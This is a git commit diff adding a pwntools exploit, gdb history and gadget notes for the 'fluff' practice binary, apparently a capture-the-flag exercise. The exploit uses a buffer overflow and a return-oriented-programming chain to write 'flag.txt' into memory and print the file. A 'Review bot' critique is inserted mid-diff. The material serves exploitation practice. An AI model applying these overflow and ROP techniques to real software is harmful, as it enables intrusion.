From 4c25bd918847e914875e900285008eb3865ca8b6 Mon Sep 17 00:00:00 2001
From: Brett Weiland
Date: Thu, 17 Dec 2020 19:39:54 -0600
Subject: new file: x86_64/fluff/exploit.py new file: x86_64/fluff/gadgets
---
x86_64/fluff/.gdb_history | 239 ++++++++++++++++++++++++++++++++++++++++++++++
x86_64/fluff/core | Bin 0 -> 4292608 bytes
x86_64/fluff/exploit.py | 49 ++++++++++
x86_64/fluff/gadgets | 44 +++++++++
4 files changed, 332 insertions(+)
create mode 100644 x86_64/fluff/.gdb_history
create mode 100644 x86_64/fluff/core
create mode 100755 x86_64/fluff/exploit.py
create mode 100644 x86_64/fluff/gadgets
(limited to 'x86_64/fluff')
diff --git a/x86_64/fluff/.gdb_history b/x86_64/fluff/.gdb_history
new file mode 100644
index 0000000..cfa1057
--- /dev/null
+++ b/x86_64/fluff/.gdb_history
@@ -0,0 +1,239 @@ +quit +quit +continue +nexti +nexti +info reg rdi +stepi +nexti +info reg rcx +nexti +info reg rbx +stepi +info reg rdx +inro reg rbx +info reg rbx +quit +stepi +continue +stepi +x rbx +info reg rbx +quit +conitnue +continue +stepi +info reg rbx +info reg rcx +quit +continue +stepi +info reg rbx +info reg rdx +quit +continue +stepi +info reg rbx +quit +continue +stepi +info reg rbx +quit +continue +stepi +info reg rbx +quit +continue +stepi +stepi +info reg rcx +stepi +info reg rbx +info reg rdx +quit +continue +stepi +info reg rbx +stepi +info reg rbx +quit +stepi +continue +stepi +info reg rbx +stepi +info reg rbx +quit +quit +continue +stepi +info reg rbx +quit +stepi +continue +stepi +info reg rbx +stepi +info reg rbx +quit +continue +stepi +info reg rbx +stepi +info reg rdx +quit +continue +stepi +info reg rbx +quit +continue +stepi +quit +continue +stepi +info reg rbx +quit +quit +continue +stepi +stepi +info reg rbp +stepi +info reg rax +stepi +info reg rax +stepi +info reg rdi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +q +continue +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +x/s 0x601be0 +stepi +quit +conitnue +continue +continue +stepi +quit +x 0x0000000000400000 +x/c 0x0000000000400000 +x/c 0x00000000004003c4 +x/c 0x0000000000400000 +quit +continue +stepi +x/s 0x601be0 +x/c 0x0000000000400251 +stepi +stepi +x/s flag.txt +x/s 0x601be0 +quit +watch *0x601be0 + 7 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +x/s 0x601be1 +x/s 0x601be0 +x/s 0x601be7 +continue +x/s 0x601be7 +x/s 0x601be0 +continue +quit +watch *0x601be4 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +stepi +x/s $rdi +x/s 0x601be0 +quit +continue +x/s 0x601be0 +quit +break *0x00000000004006a3 +continue +context +stepi +x/s $rdi +stepi +quit +break *0x00000000004006a3 +continue +context +c/s 0x7ffdf0faba10 - 8 +x/s 0x7ffdf0faba10 - 8 +x/s 0x7ffdf0faba10 - 4 +x/s 
0x7ffdf0faba10 - 16 +x/x 0x7ffdf0faba10 - 8 +x/x 0x7ffdf0faba10 +x/x 0x7ffdf0faba10 = 4 +x/x 0x7ffdf0faba10 - 4 +x/x 0x7ffdf0faba10 + 4 +context +info reg rdi +info reg rip +search +search 0x601be0 +search --qword 0x601be0 +search --qword 0x601be0 --writable +search --qword 0x0000000000400510 --writable +context +continue +stepi +continue +stepi +quit +break *0x00000000004006a3 +continue +stepi +continue +x/i 0x400639 +x/10i 0x400639 +quit +break *0x400639 +conitnue +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +quit +break *0x400639 +continue +continue +x/s 0x601be0 +continue +x/s 0x601be0 +continue +x/s 0x601be0 +stepi +stepi +x/s 0x601be0 +x/x 0x601be0 + 8 +x/x 0x601be0 + 9 +x/x 0x601be0 + 10 +quit diff --git a/x86_64/fluff/core b/x86_64/fluff/core new file mode 100644 index 0000000..ae36a67 Binary files /dev/null and b/x86_64/fluff/core differ diff --git a/x86_64/fluff/exploit.py b/x86_64/fluff/exploit.py new file mode 100755 index 0000000..cdf5de8 --- /dev/null +++ b/x86_64/fluff/exploit.py 
@@ -0,0 +1,49 @@
+#!/usr/bin/env python3
+from pwn import *
+
+letter_lookups = {
+ 'f' : 0x00000000004003c4,
+ 'l' : 0x0000000000400239,
+ 'a' : 0x00000000004003d6,
+ 'g' : 0x00000000004003cf,
+ '.' : 0x0000000000400251,
+ 't' : 0x0000000000400192,
+ 'x' : 0x0000000000400246}
+
+def write_str(dest, string, payload):
+ payload += p64(0x00000000004006a3)
+ payload += p64(dest)
+ for c in string:
+ payload += p64(0x40062a)
+ payload += p64(0x4000) # if things go wrong, check endian/order
+ payload += p64(letter_lookups[c] - 0x3ef2)
+
+ payload += p64(0x0000000000400610)
+ payload += p64(0)
+
+ payload += p64(0x400628)
+
+ payload += p64(0x400639)
+
+ return(payload)
+
+
+prog = gdb.debug('./fluff', gdbscript='''
+break *pwnme + 151
+'''
+)
+payload = b''
+for c in range(40):
+ payload += b'a'
+
+payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
+payload += p64(0x00000000004006a3)
+payload += p64(0x601be0) # set rdi
+
+payload += p64(0x0000000000400510)
+
+payload += b"\n"
+prog.sendline(payload)
+sleep(1)
+print(str(prog.recv(), 'UTF-8'))
+prog.interactive()
diff --git a/x86_64/fluff/gadgets b/x86_64/fluff/gadgets
new file mode 100644
index 0000000..6c2f329
--- /dev/null
+++ b/x86_64/fluff/gadgets
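Review bot: The gadget addresses in write_str and in the script body are bare, repeated literals (0x00000000004006a3 is pasted in both places, and the `p64(0x4000)` line carries only a leftover "check endian/order" debugging note), so the file cannot be read against the gadgets notes committed alongside it without cross-referencing by hand; naming each address once at the top, e.g. `POP_RDI_RET = 0x00000000004006a3`, and replacing the leftover note with a comment stating what that word encodes would make the script maintainable. The `'.'` entry in letter_lookups (0x0000000000400251) also disagrees with the gadgets file, which lists 0x0000000000400000 for `'.'`; the .gdb_history added in this commit shows 0x400251 being examined, so the notes file looks stale and the two should be reconciled. Two style points: the padding loop is simply `payload = b'a' * 40`, and `return(payload)` should be `return payload`. Finally, the commit also checks in a 4 MB `core` dump and a `.gdb_history`; both are local debugging artifacts (a core file can hold arbitrary process memory) and belong in .gitignore rather than in the tree.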
@@ -0,0 +1,44 @@ +Memory bytes information +======================================================= +0x00000000004003c4 : 'f' +0x0000000000400239 : 'l' +0x00000000004003d6 : 'a' +0x00000000004003cf : 'g' +0x0000000000400000 : '.' +0x0000000000400192 : 't' +0x0000000000400246 : 'x' +0x0000000000400192 : 't' + +0x0000000000400610 : mov eax, 0 ; pop rbp ; ret + +400628: d7 xlat BYTE PTR ds:[rbx] #mov al, [rbx + al] requires rbx +*** +40062a: 5a pop rdx +40062b: 59 pop rcx +40062c: 48 81 c1 f2 3e 00 00 add rcx,0x3ef2 +400633: c4 e2 e8 f7 d9 bextr rbx,rcx,rdx + +#rdx is controller. +rdx bits 0-7: starting bit +rdx bits 8-15: length +*** +400639: aa stos BYTE PTR es:[rdi],al #moves al to rdi, then adds rdi + # requires rdi (check), al + + + +0000000000400510 : print_file@plt + + +0x00000000004006a3 : pop rdi ; ret + + +exploit: + +write to memory using al as letter + set al to zero + set rbx to memory location + rcx: (location - 0x3ef2) before bextr + rdx: 0x00 0x20 (from position zero, using 32 bits) + + -- cgit v1.2.3